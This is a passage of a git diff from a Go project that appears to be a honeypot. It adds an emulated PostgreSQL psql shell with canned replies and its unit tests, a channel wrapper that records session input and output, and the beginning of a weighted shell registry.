||||||
|
\g [(OPTIONS)] [FILE] execute query (and send result to file or |pipe)
|
||||||
|
\gdesc describe result of query, without executing it
|
||||||
|
\gexec execute query, then execute each value in its result
|
||||||
|
\gset [PREFIX] execute query and store result in psql variables
|
||||||
|
\gx [(OPTIONS)] [FILE] as \g, but forces expanded output mode
|
||||||
|
\q quit psql
|
||||||
|
\watch [SEC] execute query every SEC seconds
|
||||||
|
|
||||||
|
Informational
|
||||||
|
(options: S = show system objects, + = additional detail)
|
||||||
|
\d[S+] list tables, views, and sequences
|
||||||
|
\d[S+] NAME describe table, view, sequence, or index
|
||||||
|
\da[S] [PATTERN] list aggregates
|
||||||
|
\dA[+] [PATTERN] list access methods
|
||||||
|
\dt[S+] [PATTERN] list tables
|
||||||
|
\du[S+] [PATTERN] list roles
|
||||||
|
\l[+] [PATTERN] list databases`
|
||||||
|
}
|
||||||
|
|
||||||
|
func sqlHelp() string {
|
||||||
|
return `Available help:
|
||||||
|
ABORT CREATE LANGUAGE
|
||||||
|
ALTER AGGREGATE CREATE MATERIALIZED VIEW
|
||||||
|
ALTER COLLATION CREATE OPERATOR
|
||||||
|
ALTER CONVERSION CREATE POLICY
|
||||||
|
ALTER DATABASE CREATE PROCEDURE
|
||||||
|
ALTER DEFAULT PRIVILEGES CREATE PUBLICATION
|
||||||
|
ALTER DOMAIN CREATE ROLE
|
||||||
|
ALTER EVENT TRIGGER CREATE RULE
|
||||||
|
ALTER EXTENSION CREATE SCHEMA
|
||||||
|
ALTER FOREIGN DATA WRAPPER CREATE SEQUENCE
|
||||||
|
ALTER FOREIGN TABLE CREATE SERVER
|
||||||
|
ALTER FUNCTION CREATE STATISTICS
|
||||||
|
ALTER GROUP CREATE SUBSCRIPTION
|
||||||
|
ALTER INDEX CREATE TABLE
|
||||||
|
ALTER LANGUAGE CREATE TABLESPACE
|
||||||
|
BEGIN DELETE
|
||||||
|
COMMIT DROP TABLE
|
||||||
|
CREATE DATABASE INSERT
|
||||||
|
CREATE INDEX ROLLBACK
|
||||||
|
SELECT UPDATE`
|
||||||
|
}
|
||||||
137
internal/shell/psql/psql.go
Normal file
137
internal/shell/psql/psql.go
Normal file
@@ -0,0 +1,137 @@
|
|||||||
|
package psql
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"errors"
|
||||||
|
"fmt"
|
||||||
|
"io"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/shell"
|
||||||
|
)
|
||||||
|
|
||||||
|
const sessionTimeout = 5 * time.Minute
|
||||||
|
|
||||||
|
// PsqlShell emulates a PostgreSQL psql interactive terminal.
|
||||||
|
type PsqlShell struct{}
|
||||||
|
|
||||||
|
// NewPsqlShell returns a new PsqlShell instance.
|
||||||
|
func NewPsqlShell() *PsqlShell {
|
||||||
|
return &PsqlShell{}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (p *PsqlShell) Name() string { return "psql" }
|
||||||
|
func (p *PsqlShell) Description() string { return "PostgreSQL psql interactive terminal" }
|
||||||
|
|
||||||
|
func (p *PsqlShell) Handle(ctx context.Context, sess *shell.SessionContext, rw io.ReadWriteCloser) error {
|
||||||
|
ctx, cancel := context.WithTimeout(ctx, sessionTimeout)
|
||||||
|
defer cancel()
|
||||||
|
|
||||||
|
dbName := configString(sess.ShellConfig, "db_name", "postgres")
|
||||||
|
pgVersion := configString(sess.ShellConfig, "pg_version", "15.4")
|
||||||
|
|
||||||
|
// Print startup banner.
|
||||||
|
fmt.Fprint(rw, startupBanner(pgVersion))
|
||||||
|
|
||||||
|
var sqlBuf []string // accumulates multi-line SQL
|
||||||
|
|
||||||
|
for {
|
||||||
|
prompt := buildPrompt(dbName, len(sqlBuf) > 0)
|
||||||
|
if _, err := fmt.Fprint(rw, prompt); err != nil {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
line, err := shell.ReadLine(ctx, rw)
|
||||||
|
if errors.Is(err, io.EOF) {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
if err != nil {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
trimmed := strings.TrimSpace(line)
|
||||||
|
|
||||||
|
// Empty line in non-buffering state: just re-prompt.
|
||||||
|
if trimmed == "" && len(sqlBuf) == 0 {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
|
||||||
|
// Backslash commands dispatch immediately (even mid-buffer they cancel the buffer).
|
||||||
|
if strings.HasPrefix(trimmed, `\`) {
|
||||||
|
sqlBuf = nil // discard any partial SQL
|
||||||
|
|
||||||
|
result := dispatchBackslash(trimmed, dbName)
|
||||||
|
if result.output != "" {
|
||||||
|
output := strings.ReplaceAll(result.output, "\n", "\r\n")
|
||||||
|
fmt.Fprintf(rw, "%s\r\n", output)
|
||||||
|
}
|
||||||
|
|
||||||
|
if sess.Store != nil {
|
||||||
|
if err := sess.Store.AppendSessionLog(ctx, sess.SessionID, trimmed, result.output); err != nil {
|
||||||
|
return fmt.Errorf("append session log: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if sess.OnCommand != nil {
|
||||||
|
sess.OnCommand("psql")
|
||||||
|
}
|
||||||
|
|
||||||
|
if result.exit {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
|
||||||
|
// Accumulate SQL lines.
|
||||||
|
sqlBuf = append(sqlBuf, line)
|
||||||
|
|
||||||
|
// Check if the statement is terminated by a semicolon.
|
||||||
|
if !strings.HasSuffix(strings.TrimSpace(line), ";") {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
|
||||||
|
// Full statement ready — join and dispatch.
|
||||||
|
fullSQL := strings.Join(sqlBuf, " ")
|
||||||
|
sqlBuf = nil
|
||||||
|
|
||||||
|
result := dispatchSQL(fullSQL, dbName, pgVersion)
|
||||||
|
if result.output != "" {
|
||||||
|
output := strings.ReplaceAll(result.output, "\n", "\r\n")
|
||||||
|
fmt.Fprintf(rw, "%s\r\n", output)
|
||||||
|
}
|
||||||
|
|
||||||
|
if sess.Store != nil {
|
||||||
|
if err := sess.Store.AppendSessionLog(ctx, sess.SessionID, fullSQL, result.output); err != nil {
|
||||||
|
return fmt.Errorf("append session log: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if sess.OnCommand != nil {
|
||||||
|
sess.OnCommand("psql")
|
||||||
|
}
|
||||||
|
|
||||||
|
if result.exit {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// buildPrompt returns the psql prompt. continuation is true when buffering multi-line SQL.
|
||||||
|
func buildPrompt(dbName string, continuation bool) string {
|
||||||
|
if continuation {
|
||||||
|
return dbName + "-# "
|
||||||
|
}
|
||||||
|
return dbName + "=# "
|
||||||
|
}
|
||||||
|
|
||||||
|
// configString reads a string from the shell config map with a default.
|
||||||
|
func configString(cfg map[string]any, key, defaultVal string) string {
|
||||||
|
if cfg == nil {
|
||||||
|
return defaultVal
|
||||||
|
}
|
||||||
|
if v, ok := cfg[key]; ok {
|
||||||
|
if s, ok := v.(string); ok && s != "" {
|
||||||
|
return s
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return defaultVal
|
||||||
|
}
|
||||||
330
internal/shell/psql/psql_test.go
Normal file
330
internal/shell/psql/psql_test.go
Normal file
@@ -0,0 +1,330 @@
|
|||||||
|
package psql
|
||||||
|
|
||||||
|
import (
|
||||||
|
"strings"
|
||||||
|
"testing"
|
||||||
|
)
|
||||||
|
|
||||||
|
// --- Prompt tests ---
|
||||||
|
|
||||||
|
func TestBuildPromptNormal(t *testing.T) {
|
||||||
|
got := buildPrompt("postgres", false)
|
||||||
|
if got != "postgres=# " {
|
||||||
|
t.Errorf("buildPrompt(postgres, false) = %q, want %q", got, "postgres=# ")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestBuildPromptContinuation(t *testing.T) {
|
||||||
|
got := buildPrompt("postgres", true)
|
||||||
|
if got != "postgres-# " {
|
||||||
|
t.Errorf("buildPrompt(postgres, true) = %q, want %q", got, "postgres-# ")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestBuildPromptCustomDB(t *testing.T) {
|
||||||
|
got := buildPrompt("mydb", false)
|
||||||
|
if got != "mydb=# " {
|
||||||
|
t.Errorf("buildPrompt(mydb, false) = %q, want %q", got, "mydb=# ")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// --- Backslash command dispatch tests ---
|
||||||
|
|
||||||
|
func TestBackslashQuit(t *testing.T) {
|
||||||
|
result := dispatchBackslash(`\q`, "postgres")
|
||||||
|
if !result.exit {
|
||||||
|
t.Error("\\q should set exit=true")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestBackslashListTables(t *testing.T) {
|
||||||
|
result := dispatchBackslash(`\dt`, "postgres")
|
||||||
|
if !strings.Contains(result.output, "users") {
|
||||||
|
t.Error("\\dt should list tables including 'users'")
|
||||||
|
}
|
||||||
|
if !strings.Contains(result.output, "sessions") {
|
||||||
|
t.Error("\\dt should list tables including 'sessions'")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestBackslashDescribeTable(t *testing.T) {
|
||||||
|
result := dispatchBackslash(`\d users`, "postgres")
|
||||||
|
if !strings.Contains(result.output, "username") {
|
||||||
|
t.Error("\\d users should describe users table with 'username' column")
|
||||||
|
}
|
||||||
|
if !strings.Contains(result.output, "PRIMARY KEY") {
|
||||||
|
t.Error("\\d users should include index info")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestBackslashDescribeUnknownTable(t *testing.T) {
|
||||||
|
result := dispatchBackslash(`\d nonexistent`, "postgres")
|
||||||
|
if !strings.Contains(result.output, "Did not find") {
|
||||||
|
t.Error("\\d nonexistent should return not found message")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestBackslashListDatabases(t *testing.T) {
|
||||||
|
result := dispatchBackslash(`\l`, "postgres")
|
||||||
|
if !strings.Contains(result.output, "postgres") {
|
||||||
|
t.Error("\\l should list databases including 'postgres'")
|
||||||
|
}
|
||||||
|
if !strings.Contains(result.output, "template0") {
|
||||||
|
t.Error("\\l should list databases including 'template0'")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestBackslashListRoles(t *testing.T) {
|
||||||
|
result := dispatchBackslash(`\du`, "postgres")
|
||||||
|
if !strings.Contains(result.output, "postgres") {
|
||||||
|
t.Error("\\du should list roles including 'postgres'")
|
||||||
|
}
|
||||||
|
if !strings.Contains(result.output, "Superuser") {
|
||||||
|
t.Error("\\du should show Superuser attribute for postgres")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestBackslashConnInfo(t *testing.T) {
|
||||||
|
result := dispatchBackslash(`\conninfo`, "mydb")
|
||||||
|
if !strings.Contains(result.output, "mydb") {
|
||||||
|
t.Error("\\conninfo should include database name")
|
||||||
|
}
|
||||||
|
if !strings.Contains(result.output, "5432") {
|
||||||
|
t.Error("\\conninfo should include port")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestBackslashHelp(t *testing.T) {
|
||||||
|
result := dispatchBackslash(`\?`, "postgres")
|
||||||
|
if !strings.Contains(result.output, `\q`) {
|
||||||
|
t.Error("\\? should include \\q in help output")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestBackslashSQLHelp(t *testing.T) {
|
||||||
|
result := dispatchBackslash(`\h`, "postgres")
|
||||||
|
if !strings.Contains(result.output, "SELECT") {
|
||||||
|
t.Error("\\h should include SQL commands like SELECT")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestBackslashUnknown(t *testing.T) {
|
||||||
|
result := dispatchBackslash(`\xyz`, "postgres")
|
||||||
|
if !strings.Contains(result.output, "Invalid command") {
|
||||||
|
t.Error("unknown backslash command should return error")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// --- SQL dispatch tests ---
|
||||||
|
|
||||||
|
func TestSQLSelectVersion(t *testing.T) {
|
||||||
|
result := dispatchSQL("SELECT version();", "postgres", "15.4")
|
||||||
|
if !strings.Contains(result.output, "15.4") {
|
||||||
|
t.Error("SELECT version() should contain pg version")
|
||||||
|
}
|
||||||
|
if !strings.Contains(result.output, "(1 row)") {
|
||||||
|
t.Error("SELECT version() should show row count")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestSQLSelectCurrentDatabase(t *testing.T) {
|
||||||
|
result := dispatchSQL("SELECT current_database();", "mydb", "15.4")
|
||||||
|
if !strings.Contains(result.output, "mydb") {
|
||||||
|
t.Error("SELECT current_database() should return db name")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestSQLSelectCurrentUser(t *testing.T) {
|
||||||
|
result := dispatchSQL("SELECT current_user;", "postgres", "15.4")
|
||||||
|
if !strings.Contains(result.output, "postgres") {
|
||||||
|
t.Error("SELECT current_user should return postgres")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestSQLSelectNow(t *testing.T) {
|
||||||
|
result := dispatchSQL("SELECT now();", "postgres", "15.4")
|
||||||
|
if !strings.Contains(result.output, "(1 row)") {
|
||||||
|
t.Error("SELECT now() should show row count")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestSQLSelectOne(t *testing.T) {
|
||||||
|
result := dispatchSQL("SELECT 1;", "postgres", "15.4")
|
||||||
|
if !strings.Contains(result.output, "1") {
|
||||||
|
t.Error("SELECT 1 should return 1")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestSQLInsert(t *testing.T) {
|
||||||
|
result := dispatchSQL("INSERT INTO users (name) VALUES ('test');", "postgres", "15.4")
|
||||||
|
if result.output != "INSERT 0 1" {
|
||||||
|
t.Errorf("INSERT output = %q, want %q", result.output, "INSERT 0 1")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestSQLUpdate(t *testing.T) {
|
||||||
|
result := dispatchSQL("UPDATE users SET name = 'foo';", "postgres", "15.4")
|
||||||
|
if result.output != "UPDATE 1" {
|
||||||
|
t.Errorf("UPDATE output = %q, want %q", result.output, "UPDATE 1")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestSQLDelete(t *testing.T) {
|
||||||
|
result := dispatchSQL("DELETE FROM users WHERE id = 1;", "postgres", "15.4")
|
||||||
|
if result.output != "DELETE 1" {
|
||||||
|
t.Errorf("DELETE output = %q, want %q", result.output, "DELETE 1")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestSQLCreateTable(t *testing.T) {
|
||||||
|
result := dispatchSQL("CREATE TABLE test (id int);", "postgres", "15.4")
|
||||||
|
if result.output != "CREATE TABLE" {
|
||||||
|
t.Errorf("CREATE TABLE output = %q, want %q", result.output, "CREATE TABLE")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestSQLCreateDatabase(t *testing.T) {
|
||||||
|
result := dispatchSQL("CREATE DATABASE testdb;", "postgres", "15.4")
|
||||||
|
if result.output != "CREATE DATABASE" {
|
||||||
|
t.Errorf("CREATE DATABASE output = %q, want %q", result.output, "CREATE DATABASE")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestSQLDropTable(t *testing.T) {
|
||||||
|
result := dispatchSQL("DROP TABLE test;", "postgres", "15.4")
|
||||||
|
if result.output != "DROP TABLE" {
|
||||||
|
t.Errorf("DROP TABLE output = %q, want %q", result.output, "DROP TABLE")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestSQLAlterTable(t *testing.T) {
|
||||||
|
result := dispatchSQL("ALTER TABLE users ADD COLUMN age int;", "postgres", "15.4")
|
||||||
|
if result.output != "ALTER TABLE" {
|
||||||
|
t.Errorf("ALTER TABLE output = %q, want %q", result.output, "ALTER TABLE")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestSQLBeginCommitRollback(t *testing.T) {
|
||||||
|
tests := []struct {
|
||||||
|
sql string
|
||||||
|
want string
|
||||||
|
}{
|
||||||
|
{"BEGIN;", "BEGIN"},
|
||||||
|
{"COMMIT;", "COMMIT"},
|
||||||
|
{"ROLLBACK;", "ROLLBACK"},
|
||||||
|
}
|
||||||
|
for _, tt := range tests {
|
||||||
|
result := dispatchSQL(tt.sql, "postgres", "15.4")
|
||||||
|
if result.output != tt.want {
|
||||||
|
t.Errorf("dispatchSQL(%q) = %q, want %q", tt.sql, result.output, tt.want)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestSQLShowServerVersion(t *testing.T) {
|
||||||
|
result := dispatchSQL("SHOW server_version;", "postgres", "15.4")
|
||||||
|
if !strings.Contains(result.output, "15.4") {
|
||||||
|
t.Error("SHOW server_version should contain version")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestSQLShowSearchPath(t *testing.T) {
|
||||||
|
result := dispatchSQL("SHOW search_path;", "postgres", "15.4")
|
||||||
|
if !strings.Contains(result.output, "public") {
|
||||||
|
t.Error("SHOW search_path should contain public")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestSQLSet(t *testing.T) {
|
||||||
|
result := dispatchSQL("SET client_encoding = 'UTF8';", "postgres", "15.4")
|
||||||
|
if result.output != "SET" {
|
||||||
|
t.Errorf("SET output = %q, want %q", result.output, "SET")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestSQLUnrecognized(t *testing.T) {
|
||||||
|
result := dispatchSQL("FOOBAR baz;", "postgres", "15.4")
|
||||||
|
if !strings.Contains(result.output, "ERROR") {
|
||||||
|
t.Error("unrecognized SQL should return error")
|
||||||
|
}
|
||||||
|
if !strings.Contains(result.output, "FOOBAR") {
|
||||||
|
t.Error("error should reference the offending token")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// --- Case insensitivity ---
|
||||||
|
|
||||||
|
func TestSQLCaseInsensitive(t *testing.T) {
|
||||||
|
result := dispatchSQL("select version();", "postgres", "15.4")
|
||||||
|
if !strings.Contains(result.output, "15.4") {
|
||||||
|
t.Error("select version() (lowercase) should work")
|
||||||
|
}
|
||||||
|
|
||||||
|
result = dispatchSQL("Select Current_Database();", "mydb", "15.4")
|
||||||
|
if !strings.Contains(result.output, "mydb") {
|
||||||
|
t.Error("mixed case SELECT should work")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// --- Startup banner ---
|
||||||
|
|
||||||
|
func TestStartupBanner(t *testing.T) {
|
||||||
|
banner := startupBanner("15.4")
|
||||||
|
if !strings.Contains(banner, "psql (15.4)") {
|
||||||
|
t.Errorf("banner should contain version, got: %s", banner)
|
||||||
|
}
|
||||||
|
if !strings.Contains(banner, "help") {
|
||||||
|
t.Error("banner should mention help")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// --- configString ---
|
||||||
|
|
||||||
|
func TestConfigString(t *testing.T) {
|
||||||
|
cfg := map[string]any{"db_name": "mydb"}
|
||||||
|
if got := configString(cfg, "db_name", "postgres"); got != "mydb" {
|
||||||
|
t.Errorf("configString() = %q, want %q", got, "mydb")
|
||||||
|
}
|
||||||
|
if got := configString(cfg, "missing", "default"); got != "default" {
|
||||||
|
t.Errorf("configString() for missing = %q, want %q", got, "default")
|
||||||
|
}
|
||||||
|
if got := configString(nil, "key", "default"); got != "default" {
|
||||||
|
t.Errorf("configString(nil) = %q, want %q", got, "default")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// --- Shell metadata ---
|
||||||
|
|
||||||
|
func TestShellNameAndDescription(t *testing.T) {
|
||||||
|
s := NewPsqlShell()
|
||||||
|
if s.Name() != "psql" {
|
||||||
|
t.Errorf("Name() = %q, want %q", s.Name(), "psql")
|
||||||
|
}
|
||||||
|
if s.Description() == "" {
|
||||||
|
t.Error("Description() should not be empty")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// --- formatSingleValue ---
|
||||||
|
|
||||||
|
func TestFormatSingleValue(t *testing.T) {
|
||||||
|
out := formatSingleValue("?column?", "1")
|
||||||
|
if !strings.Contains(out, "?column?") {
|
||||||
|
t.Error("should contain column name")
|
||||||
|
}
|
||||||
|
if !strings.Contains(out, "1") {
|
||||||
|
t.Error("should contain value")
|
||||||
|
}
|
||||||
|
if !strings.Contains(out, "(1 row)") {
|
||||||
|
t.Error("should contain row count")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// --- \d with no args ---
|
||||||
|
|
||||||
|
func TestBackslashDescribeNoArgs(t *testing.T) {
|
||||||
|
result := dispatchBackslash(`\d`, "postgres")
|
||||||
|
if !strings.Contains(result.output, "users") {
|
||||||
|
t.Error("\\d with no args should list tables")
|
||||||
|
}
|
||||||
|
}
|
||||||
62
internal/shell/recorder.go
Normal file
62
internal/shell/recorder.go
Normal file
@@ -0,0 +1,62 @@
|
|||||||
|
package shell
|
||||||
|
|
||||||
|
import (
|
||||||
|
"io"
|
||||||
|
"time"
|
||||||
|
)
|
||||||
|
|
||||||
|
// EventCallback is called with a copy of data whenever the channel is read or written.
|
||||||
|
// direction is 0 for input (client→server) and 1 for output (server→client).
|
||||||
|
type EventCallback func(ts time.Time, direction int, data []byte)
|
||||||
|
|
||||||
|
// RecordingChannel wraps an io.ReadWriteCloser and optionally invokes callbacks
|
||||||
|
// on every Read (input) and Write (output).
|
||||||
|
type RecordingChannel struct {
|
||||||
|
inner io.ReadWriteCloser
|
||||||
|
callbacks []EventCallback
|
||||||
|
}
|
||||||
|
|
||||||
|
// NewRecordingChannel returns a RecordingChannel wrapping rw.
|
||||||
|
func NewRecordingChannel(rw io.ReadWriteCloser) *RecordingChannel {
|
||||||
|
return &RecordingChannel{inner: rw}
|
||||||
|
}
|
||||||
|
|
||||||
|
// WithCallback clears existing callbacks, sets the given one, and returns the
|
||||||
|
// RecordingChannel for chaining. Kept for backward compatibility.
|
||||||
|
func (r *RecordingChannel) WithCallback(cb EventCallback) *RecordingChannel {
|
||||||
|
r.callbacks = []EventCallback{cb}
|
||||||
|
return r
|
||||||
|
}
|
||||||
|
|
||||||
|
// AddCallback appends an additional event callback.
|
||||||
|
func (r *RecordingChannel) AddCallback(cb EventCallback) {
|
||||||
|
r.callbacks = append(r.callbacks, cb)
|
||||||
|
}
|
||||||
|
|
||||||
|
func (r *RecordingChannel) Read(p []byte) (int, error) {
|
||||||
|
n, err := r.inner.Read(p)
|
||||||
|
if n > 0 && len(r.callbacks) > 0 {
|
||||||
|
ts := time.Now()
|
||||||
|
cp := make([]byte, n)
|
||||||
|
copy(cp, p[:n])
|
||||||
|
for _, cb := range r.callbacks {
|
||||||
|
cb(ts, 0, cp)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return n, err
|
||||||
|
}
|
||||||
|
|
||||||
|
func (r *RecordingChannel) Write(p []byte) (int, error) {
|
||||||
|
n, err := r.inner.Write(p)
|
||||||
|
if n > 0 && len(r.callbacks) > 0 {
|
||||||
|
ts := time.Now()
|
||||||
|
cp := make([]byte, n)
|
||||||
|
copy(cp, p[:n])
|
||||||
|
for _, cb := range r.callbacks {
|
||||||
|
cb(ts, 1, cp)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return n, err
|
||||||
|
}
|
||||||
|
|
||||||
|
func (r *RecordingChannel) Close() error { return r.inner.Close() }
|
||||||
122
internal/shell/recorder_test.go
Normal file
122
internal/shell/recorder_test.go
Normal file
@@ -0,0 +1,122 @@
|
|||||||
|
package shell
|
||||||
|
|
||||||
|
import (
|
||||||
|
"bytes"
|
||||||
|
"io"
|
||||||
|
"sync"
|
||||||
|
"testing"
|
||||||
|
"time"
|
||||||
|
)
|
||||||
|
|
||||||
|
// nopCloser wraps a ReadWriter with a no-op Close.
|
||||||
|
type nopCloser struct {
|
||||||
|
io.ReadWriter
|
||||||
|
}
|
||||||
|
|
||||||
|
func (nopCloser) Close() error { return nil }
|
||||||
|
|
||||||
|
func TestRecordingChannelPassthrough(t *testing.T) {
|
||||||
|
var buf bytes.Buffer
|
||||||
|
rc := NewRecordingChannel(nopCloser{&buf})
|
||||||
|
|
||||||
|
// Write through the recorder.
|
||||||
|
msg := []byte("hello")
|
||||||
|
n, err := rc.Write(msg)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("Write: %v", err)
|
||||||
|
}
|
||||||
|
if n != len(msg) {
|
||||||
|
t.Errorf("Write n = %d, want %d", n, len(msg))
|
||||||
|
}
|
||||||
|
|
||||||
|
// Read through the recorder.
|
||||||
|
out := make([]byte, 16)
|
||||||
|
n, err = rc.Read(out)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("Read: %v", err)
|
||||||
|
}
|
||||||
|
if string(out[:n]) != "hello" {
|
||||||
|
t.Errorf("Read = %q, want %q", out[:n], "hello")
|
||||||
|
}
|
||||||
|
|
||||||
|
if err := rc.Close(); err != nil {
|
||||||
|
t.Fatalf("Close: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestRecordingChannelMultiCallback(t *testing.T) {
|
||||||
|
var buf bytes.Buffer
|
||||||
|
rc := NewRecordingChannel(nopCloser{&buf})
|
||||||
|
|
||||||
|
type event struct {
|
||||||
|
ts time.Time
|
||||||
|
direction int
|
||||||
|
data string
|
||||||
|
}
|
||||||
|
|
||||||
|
var mu sync.Mutex
|
||||||
|
var events1, events2 []event
|
||||||
|
|
||||||
|
rc.AddCallback(func(ts time.Time, direction int, data []byte) {
|
||||||
|
mu.Lock()
|
||||||
|
defer mu.Unlock()
|
||||||
|
events1 = append(events1, event{ts, direction, string(data)})
|
||||||
|
})
|
||||||
|
rc.AddCallback(func(ts time.Time, direction int, data []byte) {
|
||||||
|
mu.Lock()
|
||||||
|
defer mu.Unlock()
|
||||||
|
events2 = append(events2, event{ts, direction, string(data)})
|
||||||
|
})
|
||||||
|
|
||||||
|
// Write triggers both callbacks with direction=1.
|
||||||
|
rc.Write([]byte("hello"))
|
||||||
|
|
||||||
|
// Read triggers both callbacks with direction=0.
|
||||||
|
out := make([]byte, 16)
|
||||||
|
rc.Read(out)
|
||||||
|
|
||||||
|
mu.Lock()
|
||||||
|
defer mu.Unlock()
|
||||||
|
|
||||||
|
if len(events1) != 2 {
|
||||||
|
t.Fatalf("callback1 got %d events, want 2", len(events1))
|
||||||
|
}
|
||||||
|
if len(events2) != 2 {
|
||||||
|
t.Fatalf("callback2 got %d events, want 2", len(events2))
|
||||||
|
}
|
||||||
|
|
||||||
|
// Write event should be direction=1.
|
||||||
|
if events1[0].direction != 1 {
|
||||||
|
t.Errorf("write direction = %d, want 1", events1[0].direction)
|
||||||
|
}
|
||||||
|
// Read event should be direction=0.
|
||||||
|
if events1[1].direction != 0 {
|
||||||
|
t.Errorf("read direction = %d, want 0", events1[1].direction)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Both callbacks should get the same timestamp for a single operation.
|
||||||
|
if events1[0].ts != events2[0].ts {
|
||||||
|
t.Error("callbacks should receive the same timestamp")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestRecordingChannelWithCallbackClearsExisting(t *testing.T) {
|
||||||
|
var buf bytes.Buffer
|
||||||
|
rc := NewRecordingChannel(nopCloser{&buf})
|
||||||
|
|
||||||
|
called1 := false
|
||||||
|
called2 := false
|
||||||
|
|
||||||
|
rc.AddCallback(func(_ time.Time, _ int, _ []byte) { called1 = true })
|
||||||
|
// WithCallback should clear existing and set new.
|
||||||
|
rc.WithCallback(func(_ time.Time, _ int, _ []byte) { called2 = true })
|
||||||
|
|
||||||
|
rc.Write([]byte("x"))
|
||||||
|
|
||||||
|
if called1 {
|
||||||
|
t.Error("first callback should not be called after WithCallback")
|
||||||
|
}
|
||||||
|
if !called2 {
|
||||||
|
t.Error("second callback should be called")
|
||||||
|
}
|
||||||
|
}
|
||||||
84
internal/shell/registry.go
Normal file
84
internal/shell/registry.go
Normal file
@@ -0,0 +1,84 @@
|
|||||||
|
package shell
|
||||||
|
|
||||||
|
import (
|
||||||
|
"errors"
|
||||||
|
"fmt"
|
||||||
|
"math/rand/v2"
|
||||||
|
"sync"
|
||||||
|
)
|
||||||
|
|
||||||
|
type registryEntry struct {
|
||||||
|
shell Shell
|
||||||
|
weight int
|
||||||
|
}
|
||||||
|
|
||||||
|
// Registry holds shells with associated weights for random selection.
|
||||||
|
type Registry struct {
|
||||||
|
mu sync.RWMutex
|
||||||
|
entries []registryEntry
|
||||||
|
}
|
||||||
|
|
||||||
|
// NewRegistry returns an empty Registry.
|
||||||
|
func NewRegistry() *Registry {
|
||||||
|
return &Registry{}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Register adds a shell with the given weight. Weight must be >= 1 and
|
||||||
|
// no duplicate names are allowed.
|
||||||
|
func (r *Registry) Register(shell Shell, weight int) error {
|
||||||
|
if weight < 1 {
|
||||||
|
return fmt.Errorf("weight must be >= 1, got %d", weight)
|
||||||
|
}
|
||||||
|
|
||||||
|
r.mu.Lock()
|
||||||
|
defer r.mu.Unlock()
|
||||||
|
|
||||||
|
for _, e := range r.entries {
|
||||||
|
if e.shell.Name() == shell.Name() {
|
||||||
|
return fmt.Errorf("shell %q already registered", shell.Name())
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
r.entries = append(r.entries, registryEntry{shell: shell, weight: weight})
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
